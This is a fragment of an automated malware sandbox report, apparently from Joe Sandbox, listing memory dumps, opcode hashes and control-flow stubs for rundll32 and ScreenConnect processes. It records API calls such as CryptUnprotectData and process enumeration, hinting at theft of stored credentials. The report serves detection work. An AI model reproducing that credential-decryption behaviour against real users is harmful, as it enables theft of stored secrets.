                                                                      • Opcode Fuzzy Hash: 72fc32f406807c3669f988cf1e3b366e846bded88a35244a42ab8c415ff8aee3
                                                                      • Instruction Fuzzy Hash: C101B5717041089BDB18AA79C4547AF7AE39FC8614F20846DD40AB73D4CFB94D15CBD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1715206918.0000000004B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4b1d000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e53d9b603562c2ef39e4dda655c15a01f021f45baace417148c591c0e59a93ef
                                                                      • Instruction ID: 4d81c935d7bb40d1692283bae03dd8b15c7288941d270a189180b60899453bf0
                                                                      • Opcode Fuzzy Hash: e53d9b603562c2ef39e4dda655c15a01f021f45baace417148c591c0e59a93ef
                                                                      • Instruction Fuzzy Hash: 2701407140D3C09FE7124B259CA8752BFA8EF53224F1985DBE9888F1A7C269AC45C771
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 434980562b798cf7765d98384d7429e84eb1a99260ccf98ebfdc1584756f26af
                                                                      • Instruction ID: 37487f96cb82c116018e1f5ab427aca3c9a5380aae85edb0b023af2ca151788d
                                                                      • Opcode Fuzzy Hash: 434980562b798cf7765d98384d7429e84eb1a99260ccf98ebfdc1584756f26af
                                                                      • Instruction Fuzzy Hash: 4E01A2B6B001548BDF188A64E9152EDBBF6BB88215F54807AC004EB2D4DB75CC8187E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2cf6b03fee188ba6692b8e8ee6facf05db36eb0903c5b685aa2611787f145a7f
                                                                      • Instruction ID: d8ce0db0722580c29783952ec9fbacfd372ca52504984c0d861cfc640fb8bac2
                                                                      • Opcode Fuzzy Hash: 2cf6b03fee188ba6692b8e8ee6facf05db36eb0903c5b685aa2611787f145a7f
                                                                      • Instruction Fuzzy Hash: FFF078F2B04224DBE70526B45C103BDBB92DBC1310F08816AE108AB2E0DBE6D66383C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 761f045eda1858e9144128a147aa5d0ae3f547c0405f9f0c575c759c85c9fcb2
                                                                      • Instruction ID: 86d285ce9eac83da69123c00f0ae3c81f87f2338a56b03eb96efab657440fc76
                                                                      • Opcode Fuzzy Hash: 761f045eda1858e9144128a147aa5d0ae3f547c0405f9f0c575c759c85c9fcb2
                                                                      • Instruction Fuzzy Hash: 8F018F71B00208D7DB18AA6AC4547AF7AE69FC8614F20846DD40AB73D4CFB55D158BD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1715206918.0000000004B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4b1d000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9db3eb2e003fd808634fc60bfa076a186e93bb4d7f758073696a4fc545cbe36d
                                                                      • Instruction ID: a028b16975c9e4baf7cbb2b8e87ee539c9acf640289066b08f7b670665c7eec9
                                                                      • Opcode Fuzzy Hash: 9db3eb2e003fd808634fc60bfa076a186e93bb4d7f758073696a4fc545cbe36d
                                                                      • Instruction Fuzzy Hash: 89012B315083009AE7104E39DDD8767BFDCDF41324F18C5AAED494B156C279F841C6B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 513b75bc29efcea88ee8696e6fe83d0a79ac1e8381f42512b1c8c3be8e94af34
                                                                      • Instruction ID: dbd4c867f99c7fb615fdf63111591fa59ad4a396bff4f0bdd04a47a7ce0e3c97
                                                                      • Opcode Fuzzy Hash: 513b75bc29efcea88ee8696e6fe83d0a79ac1e8381f42512b1c8c3be8e94af34
                                                                      • Instruction Fuzzy Hash: 5FF0AFB1B00109A7EB18AA6885657AF7AB7ABCC704F24402AD105B73C0CFB94E0197E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd

                                                                      Execution Graph

                                                                      Execution Coverage:10%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:52
                                                                      Total number of Limit Nodes:7

                                                                      Control-flow Graph

                                                                      control_flow_graph 583 5e32381-5e32393 584 5e33098-5e33110 CryptUnprotectData 583->584 585 5e33112-5e33118 584->585 586 5e33119-5e33141 584->586 585->586
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E330FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 302634dbb1f74c7936127482cec616fd122292970aabe1f234536764e5f323ca
                                                                      • Instruction ID: 8fb2d35d86ec6bec28bc7e4f2700a722d6b459b154e7cf5b1469936a6e42cda2
                                                                      • Opcode Fuzzy Hash: 302634dbb1f74c7936127482cec616fd122292970aabe1f234536764e5f323ca
                                                                      • Instruction Fuzzy Hash: C9217976804349DFCB10CF99C845ADEBFF5EF48324F14845AE994A7211C335A555CFA1

                                                                      Control-flow Graph

                                                                      control_flow_graph 595 5e33090-5e33093 596 5e33098-5e33110 CryptUnprotectData 595->596 597 5e33112-5e33118 596->597 598 5e33119-5e33141 596->598 597->598
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E330FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed; API call shown: CryptUnprotectData]
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E330FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed]
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-4202989938

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed]
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-4202989938

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed]
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (&^q$(bq
                                                                      • API String ID: 0-1294341849

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed; API call shown: K32EnumProcesses]
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed; API call shown: ProcessIdToSessionId]
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05E366DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed; API call shown: K32EnumProcesses]
                                                                      APIs
                                                                      • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05E365FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: EnumProcesses
                                                                      • String ID:
                                                                      • API String ID: 84517404-0

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed]
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436

                                                                      Control-flow Graph

                                                                      • [Graph not reproduced; legend: Executed / Not Executed; API call shown: ProcessIdToSessionId]
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05E366DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [!
                                                                      • API String ID: 0-4044816477
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fc1492eddc226f95e6dc172b56e5f7a2e17880ac8dc4ac7d5c6075896abaf45
                                                                      • Instruction ID: 6266e97de3e332a0cfd6eac4fec0472d84868454d93b8cdb833589100f59a595
                                                                      • Opcode Fuzzy Hash: 8fc1492eddc226f95e6dc172b56e5f7a2e17880ac8dc4ac7d5c6075896abaf45
                                                                      • Instruction Fuzzy Hash: E341C434610601CFDB74DF2AD854626B7F6BF99314B544A2CE496EB7A4EB31F806CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70adfa5d7498ad10111c4221423ba8de50848ba245c214c0e69fdd580beb140e
                                                                      • Instruction ID: ff1c55a61da68845b045ba685071a078e3bacefdb36899670233c7b0ff64b5b7
                                                                      • Opcode Fuzzy Hash: 70adfa5d7498ad10111c4221423ba8de50848ba245c214c0e69fdd580beb140e
                                                                      • Instruction Fuzzy Hash: E3411B71E002199FDB14DFA6C890AEEBBF6EF88704F148129E515BB340DB74B946CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b05c3c6cac5778846ff078b0dbacbc0c77a03fd3cfc72e972d3af7c980e314c9
                                                                      • Instruction ID: be6620da86014ec64300ee3c19370cf28d68357ff3a5df037eff33dd0ab87577
                                                                      • Opcode Fuzzy Hash: b05c3c6cac5778846ff078b0dbacbc0c77a03fd3cfc72e972d3af7c980e314c9
                                                                      • Instruction Fuzzy Hash: 4641C3307402029FD705AABA99A423EB7E2FBC4254714C929D525EB3C4EFA4FC5A8791
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48c23ccf8f7634b9375d6f83e6997d6e2e477958645a024f5149a4cce5b81a86
                                                                      • Instruction ID: 16e12efa72abedd1bfd0836aef966bf92f78a31e6e3a361e540882531ca0308b
                                                                      • Opcode Fuzzy Hash: 48c23ccf8f7634b9375d6f83e6997d6e2e477958645a024f5149a4cce5b81a86
                                                                      • Instruction Fuzzy Hash: A6416F307007018FD734CF29D884A2AB7F2BF89314B148A59E4969B7A5EB31F846CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cdd70df65842dc0f4d1aaa128da8247be16eb9fb99335f7cfb6bc0b45741540
                                                                      • Instruction ID: b2b8a5cd051c5fa531bf232f17d98434831183438edb317a386cf83c97736c99
                                                                      • Opcode Fuzzy Hash: 0cdd70df65842dc0f4d1aaa128da8247be16eb9fb99335f7cfb6bc0b45741540
                                                                      • Instruction Fuzzy Hash: 7B319E74B002168FDB14DBADC5949AEF7F6EF89254B10817AE409EB758EB34EC018BD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bbe094927c55c1c95ca4d077e76129e1fac7bd4fd2b4d6562fda5bf2f24990a4
                                                                      • Instruction ID: 4c59fc49fabf69a113228ce30d1b9870fd8471611f5e26e32201c969c3a11656
                                                                      • Opcode Fuzzy Hash: bbe094927c55c1c95ca4d077e76129e1fac7bd4fd2b4d6562fda5bf2f24990a4
                                                                      • Instruction Fuzzy Hash: 294147747402028FCB14DF79D99496ABBF2FF8931071485A9E51ADB365EB30EC54CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 372ecbc068ab52139e175eb2bfa32a2650be6dae21dc35a9c4ab730fc590438a
                                                                      • Instruction ID: 8bb115cf224b51bb6df1e6be1cb8ced42fe67716120125406bfd72f5051acea9
                                                                      • Opcode Fuzzy Hash: 372ecbc068ab52139e175eb2bfa32a2650be6dae21dc35a9c4ab730fc590438a
                                                                      • Instruction Fuzzy Hash: 3C3126347406028FCB14DF69D994D6ABBF2FF8931071486A8E41A9B365EB71FC54CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 28655fe5d5f95933ec1f7cdf9cb3752feed23a8f61ff236e52e1f5d79b42bef9
                                                                      • Instruction ID: bcd0a91e4cba087b588321d05c8ceb195340f18b1a4c00ab2b2deecc82c1546b
                                                                      • Opcode Fuzzy Hash: 28655fe5d5f95933ec1f7cdf9cb3752feed23a8f61ff236e52e1f5d79b42bef9
                                                                      • Instruction Fuzzy Hash: D431D831600B018FC778DF6AD84866ABBF5FF85711B104B2CE466976E4EB70A948CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 070b93868467fcfc61dc776cce2ea970a75e2bbc8f3ee4bdb4b662fc6982a769
                                                                      • Instruction ID: 5bacf7fa91759921f26e37f4378869606c7743d84a4a1c713184f6f4cfb7d41a
                                                                      • Opcode Fuzzy Hash: 070b93868467fcfc61dc776cce2ea970a75e2bbc8f3ee4bdb4b662fc6982a769
                                                                      • Instruction Fuzzy Hash: 3231D1B16083428FC7029B24D89199EBFB0FF46204B0585AAD494EF362E634E90ACB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a01077b683cdac66a865b414b7c63b9bb4918256bdd598f2ee63d3da39c24136
                                                                      • Instruction ID: b759c8d9725e7a2ce465f5269d787120eb878c2f20f697f9f09fc5f813170e34
                                                                      • Opcode Fuzzy Hash: a01077b683cdac66a865b414b7c63b9bb4918256bdd598f2ee63d3da39c24136
                                                                      • Instruction Fuzzy Hash: F6313C30A012059FEB14DFA5C594AADBBF1BF8D304F244499E406BB366DB31ED12CB55
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71e84196b063efadcf20ee2545cdaf0d0fe84260568bf2e7899bdb62cc71fc41
                                                                      • Instruction ID: d998ae61d10e06616ac834fd61f07007e3b0d4920dc8a9aeb186e02959c07cee
                                                                      • Opcode Fuzzy Hash: 71e84196b063efadcf20ee2545cdaf0d0fe84260568bf2e7899bdb62cc71fc41
                                                                      • Instruction Fuzzy Hash: E4314931A002089FDB18DFA5C594AAEBBF5BF8D304F204099E506BB366DB31ED11CB94
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2956546852.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_104d000_ScreenConnect.jbxd
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8809c2e54ed60a26434e10325b3dde7d7bc19342eb7577b1f42ed645bccb3f7c
                                                                      • Instruction ID: 64f3017b35a3e4075edc11f98854d0fca69062574810d9c29e10ce28eaa851e9
                                                                      • Opcode Fuzzy Hash: 8809c2e54ed60a26434e10325b3dde7d7bc19342eb7577b1f42ed645bccb3f7c
                                                                      • Instruction Fuzzy Hash: A0215E74E0020A9FDB04EBA5D5989AEBBB1EF88304B108564D915BB354DB70ED85CB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec3582317195cd2bff2017027613a9af27900f087147fb0ec0b653a68159dc33
                                                                      • Instruction ID: be1b3f6d6c8f92a1e60ed8ae376a875cf8d3a516a01b7487d87278e2f3dbef41
                                                                      • Opcode Fuzzy Hash: ec3582317195cd2bff2017027613a9af27900f087147fb0ec0b653a68159dc33
                                                                      • Instruction Fuzzy Hash: 9D014535B002014FDB189B7C959096DB7E6DFC5244701817EE449E7369EF34EC1683C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f26de7689006f247121f63855311f08dd4a5bbc3434bd84c047688380fdf271
                                                                      • Instruction ID: cded139571328a9ece013e51d0b2e68b8eacc348314e306056e745befaa90c9e
                                                                      • Opcode Fuzzy Hash: 6f26de7689006f247121f63855311f08dd4a5bbc3434bd84c047688380fdf271
                                                                      • Instruction Fuzzy Hash: 98019E353006128FC760DF6AD49492AB7E6EF8C2243544469E94AAB365DF31FD12CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36f2b0722584d6afbe9f5e0e12d725b31e264d8a9eebf9e5aa47b66d88e544d3
                                                                      • Instruction ID: 092224599a8f9cf7a1e5edede4f2b28be7fc22259f5330871c821b1d7220a213
                                                                      • Opcode Fuzzy Hash: 36f2b0722584d6afbe9f5e0e12d725b31e264d8a9eebf9e5aa47b66d88e544d3
                                                                      • Instruction Fuzzy Hash: 9701B1B13006011BE315A76996F45AFABD3EBC0254310DA38E16AAF395DF71EC0A8790
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5749e6958c083c7472435ebce2a67bb519bbbb7f7fbe9c69bfa8242d694a20fc
                                                                      • Instruction ID: c757d1129cba76b3924d9b3c5337fa8d66b07377b50db6b8550602866ff7c16b
                                                                      • Opcode Fuzzy Hash: 5749e6958c083c7472435ebce2a67bb519bbbb7f7fbe9c69bfa8242d694a20fc
                                                                      • Instruction Fuzzy Hash: 2101D4B13002011BE315A66995F496FBAD3EBC0254750DA38E15AAF395DF71FC054790
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2956546852.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_104d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 772f8d3c864dc2e87b241902efd51d0e131e0d7603e9982bf996e69d4907c694
